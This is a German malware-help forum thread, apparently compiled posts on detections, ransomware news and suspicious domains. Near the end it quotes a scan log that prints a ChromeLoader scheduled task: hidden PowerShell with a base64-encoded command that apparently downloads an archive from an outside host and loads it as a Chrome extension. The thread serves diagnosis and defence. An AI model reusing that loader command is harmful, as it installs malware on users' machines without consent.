Zu: https://www.trojaner-board.de/202053...ml#post1754321

Der Speicherort der Bilddateien sollte auffindbar sein:
https://www.sony.de/electronics/supp...icles/00049630

Oder sie liegen in der Sony Cloud.

Zitat:

Wählen Sie den Ordner, in dem Sie die Videos und Fotos speichern möchten.

=d.h. in Zukunft

Frage ist, wie/ob bereits existierende Files verschoben/kopiert werden können,
da es anscheinend ein proprietäres Dateiformat ist.

Zitat:

Zitat von webwatcher

=d.h. in Zukunft

Es wird einen Default-Ordner geben, in den standardmäßig gespeichert wird. Der entsprechende Pfad sollte bereits als Zielverzeichnis hinterlegt sein und könnte auf die geschilderte Art und Weise auszulesen sein.
Inzwischen scheint der TO seine Daten ja gefunden zu haben, wenn er sie schon kopiert...

Nochmal zu ligafaktur: hat mir keine Ruhe gelassen und hab es deshalb mit Malwarebytes
gescannt und siehe da: auch mbam klassifiziert es als Malware
Irgendwas ist da oberfaul. Vielleicht hat ihm jemand ein faules Ei ins Nest gelegt.
Auf jeden Fall, so wie es z.Z aussieht: Finger weg und ab in die Tonne

Hab ihm das Ergebnis gemailt. Ist jetzt an ihm, ob/was er weiter unternehmen will.

Defender hatte die *.exe als "Worm:Win32/Aicat.A!ml" erkannt.
Ist von Microsoft aus der Erkennung rausgenommen.
https://share-your-photo.com/1e110e8d23

Falls sich jemand noch wundern sollte, warum Otto Normalo 3 Party AV einsetzt:
https://www.pcwelt.de/produkte/So_gu...t-8989347.html

Das wichtigste wird völlig unter den Tisch gekehrt: Unversehrtheit von Windows

Ein der besten Kommentare zum Crash in Anhalt -Bitterfeld> https://heise.de/-6141330


https://www.heise.de/forum/heise-onl...39289697/show/

Zitat:

Wobei ich anmerken möchte, dass das Management mit den Prämissen sehr unzufrieden war und das Problem auch erst nach sehr langen Erläuterungen verstanden hat. Es ist immer noch sehr unzufrieden, weil es eigentlich eine Wiederherstellung per Knopfdruck erwartet und sich darin auch durch - imho verantwortungslose - Produktwerbung auch bestärkt sieht.
Das läuft jetzt also nur deshalb so, weil sie keine Gegenmeinung eines Fachmanns dazu auftreiben konnten und die wiederholte Medienberichterstattung zu wochenlangen Ausfällen einen noch schlechteren Zeitablauf zeichnet, als er so realisiert werden kann.
Allerdings war es schwer, gegen das Vorurteil anzukommen, dass alle Betroffenen mit langen Ausfallzeiten nur Vollidioten sind, die kein Sicherungssystem bedienen können. Die Absurdität dieser Annahme hält die Leute ja nicht davon ab, sie trotzdem für valide zu erklären. Sonst müsste man sich ja echte Sorgen machen und das will man nicht.

https://heise.de/-6141310

Zitat:

Doch die Gefahr steige. Einigen Firmen müsse man die Dringlichkeit nach wie vor klarmachen.

"Es ist unmöglich, sich zu 100 Prozent zu schützen", räumt der VDMA-Experte ein. "Getroffen werden kann jeder, so wie jedes Immunsystem von einem Virus getroffen werden kann. Das gestiegene Bewusstsein muss aber auch zu Investitionen in mehr Sicherheit führen." Oft reagierten Unternehmen erst, wenn Hacker ihr Chaos schon angerichtet hätten und man nur noch reagieren könne. "Thema Nummer eins für die Maschinenbau-Branche ist jetzt die Cybersicherheit."
...
...
"Wir bewegen uns in einer Welt trügerischer Sicherheit", heißt es beim Niedersächsischen Städte- und Gemeindebund. "Auf Dauer hilft es uns nur, wenn wir wichtige Dinge in abgeschotteten Systemen bearbeiten."

Z., in dessen Verband sich Firmen zu einem Arbeitskreis gegen Netz-Erpressungen zusammengeschlossen haben, sieht das Kernproblem so: "Die Leichtsinnigkeit ist immer noch ein schwieriges Feld."

https://www.zeit.de/digital/2021-10/...hackerangriffe

Zitat:

BSI-Lagebericht 2021: Kritische Infrastruktur
Angreifer legen Krankenhäuser oder Verwaltungen lahm und gehen dabei immer professioneller vor. Die Bedrohung in Deutschland wächst, zeigt der Lagebericht des BSI.

Und die Türen weiter sperrangelweit offen:

IT-Sicherheit ist viiiel zu teuer

https://www.heise.de/news/IT-Sicherh...eitrag.beitrag

Zitat:

IT-Sicherheit: BSI warnt vor "Alarmstufe Rot"

Die Gesellschaft müsse angesichts anhaltender Bedrohungen etwa durch Ransomware und IT-Schwachstellen "wachsam und wehrhaft sein", fordert das BSI.

https://www.trojaner-board.de/202881...ml#post1758433

Zitat:

Vielleicht handelt es sich bei der Meldung von WD auch um einen Fehlalarm. Und selbst wenn nicht, sonst ist da nichts zu sehen.

https://www.microsoft.com/en-us/wdsi...tID=2147753610

Zitat:

TrojanDownloader:O97M/EncDoc.RDU!MTB

Microsoft Defender Antivirus detects and removes this threat.

This threat downloads and installs other programs, including other malware, onto your PC without your consent.

Vom blauen Himmel wird der wohl kaum auf den PC gelangt sein...

Zitat:

Zitat von webwatcher

Vom blauen Himmel wird der wohl kaum auf den PC gelangt sein...

Was sollen wir denn jetzt mit so einem Kommentar anfangen?
Niemand kann da eine 100%ige Aussage zu machen. Ich hätte jetzt den TO gefragt woher er diese Datei hat und zu was die gut ist (war!) aber die meisten wissen das ja nicht. Oder sagen dann, dass sie die schon ewig drauf haben, damit schon immer arbeiten aber dann doch löschen lassen.

Wenn sie ihn "ewig" drauf gehabt hätte, sähe der PC vermutlich im Inneren etwas anders aus.

Zitat:

This threat downloads and installs other programs, including other malware, onto your PC without your consent.

Hat eben großes Glück gehabt, dass der Defender angeschlagen hat.

Aber wenn die Leute damit arbeiten, dann doch weil sie so eine Datei selbst erstellen und/oder mit Leben füllen. Eigentlich hätte der TO diese Datei zur Verfügung stellen müssen, so bleibt alles unklar!

https://www.trojaner-board.de/203241...ml#post1760771

Zitat:

Ich wende mich an euch, weil ich beim PC meiner Eltern, einen komischen Chronik Verlauf gefunden habe.
Ständig ist die Internetseite exsalut.com enthalten. Google liefert keine brauchbaren Ergebnisse und wenn man der Seite in der Chronik folgt, kommt man ins leere.

taucht schon früher im Board und im WWW auf

exsalut.com ist auf amazon registriert
https://stuffgate.com/exsalut.com

Zitat:

Registrar URL: http://registrar.amazon.com
Updated Date: 2020-05-18T12:48:18Z
Creation Date: 2020-05-18T12:37:17Z
Registry Expiry Date: 2021-05-18T12:37:17Z

Wozu die dient, ist unklar. Hab jedenfalls keinen Hinweis/Erklärung dazu gefunden.
Aufruf liefert eine leere Seite.

Zitat:

Zitat von webwatcher

https://www.trojaner-board.de/203241...ml#post1760771

taucht schon früher im Board und im WWW auf

exsalut.com ist auf amazon registriert
https://stuffgate.com/exsalut.com


Wozu die dient, ist unklar. Hab jedenfalls keinen Hinweis/Erklärung dazu gefunden.
Aufruf liefert eine leere Seite.

Analog zu hier.

Neue Malware (hab ich auch schon bei MB gesehen).

Link zum Thema

Zitat:

Task: {FF650B09-2BA7-407F-AD46-F0DDA995556C} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAE cAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBGAGkAbAB0AGUAcgAgACIAbgBhAG0AZQA9ACcAYwBoAHIAbwBtAGUALgBlAHgAZQAnACIAKQAg AHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAJAGkAZgAoACQAXwAgAC0ATQ BhAHQAYwBoACAAIgBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4AIgApAHsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAKAAkAJABpAHMATwBwAGUAbgAgAD0AIAAxADsACgB9AAoACgBpAGYA KAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAeAB0AFAAYQB0AGgAKQApAHsACgAKAAkACQAkAGEAcgBjAG gAaQB2AGUATgBhAG0AZQAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAGEAcgBjAGgAaQB2AGUALgB6AGkAcAAiAAoACgAJAAkAdAByAHkAewAKAAkACQAJ AHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBiAHIAbwBrAGUAbgBuAGEALgB3AG8AcgBrAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaA BpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIA YQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAKAAoACQB9AAoACgAJAH QAcgB5AHsACgAJAAkARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAYwBoAHIAbwBtAGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAEMAbABvAHMAZQBNAGEAaQBu AFcAaQBuAGQAbwB3ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAfQAKAAkACQBzAHQAYQByAHQAIABjAGgAcgBvAG0AZQAgAC0ALQBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4APQAiACQAZQ B4AHQAUABhAHQAaAAiACwAIAAtAC0AcgBlAHMAdABvAHIAZQAtAGwAYQBzAHQALQBzAGUAcwBzAGkAbwBuACwAIAAtAC0AbgBvAGUAcgByAGQAaQBhAGwAbwBnAHMALAAgAC0ALQBkAGkAcwBhAGIA bABlAC0AcwBlAHMAcwBpAG8AbgAtAGMAcgBhAHMAaABlAGQALQBiAHUAYgBiAGwAZQAKAAkAfQBjAGEAdABjAGgAewB9AAoACgB9AAoACgA= /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAE cAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAL (Der Dateneintrag hat 1683 mehr Zeichen). (Keine Datei) <==== ACHTUNG

CHR Extension: (Settings) - C:\Users\tilmu\AppData\Local [2022-01-05]

C:\Users\tilmu\AppData\Local\chrome

Zitat:

========================= Folder: C:\Users\tilmu\AppData\Local\chrome ========================

2022-01-04 10:51 - 2022-01-04 09:51 - 000010714 ____A [8FD91B4289AF2CAA8006118AA082F7B7] () C:\Users\tilmu\AppData\Local\chrome\background.js
2022-01-04 10:51 - 2022-01-04 09:51 - 000000221 ____A [1B92868D55E896DA6D17BFB900DE92CF] () C:\Users\tilmu\AppData\Local\chrome\conf.js
2022-01-04 10:51 - 2022-01-04 09:51 - 000000484 ____A [A71C82A6FFE68495546E7BB7D3F62A0C] () C:\Users\tilmu\AppData\Local\chrome\manifest.json
2022-01-04 10:51 - 2022-01-04 09:51 - 000003970 ____A [4E46AD8737DD28215F3C478EE8B01DC0] () C:\Users\tilmu\AppData\Local\chrome\settings.png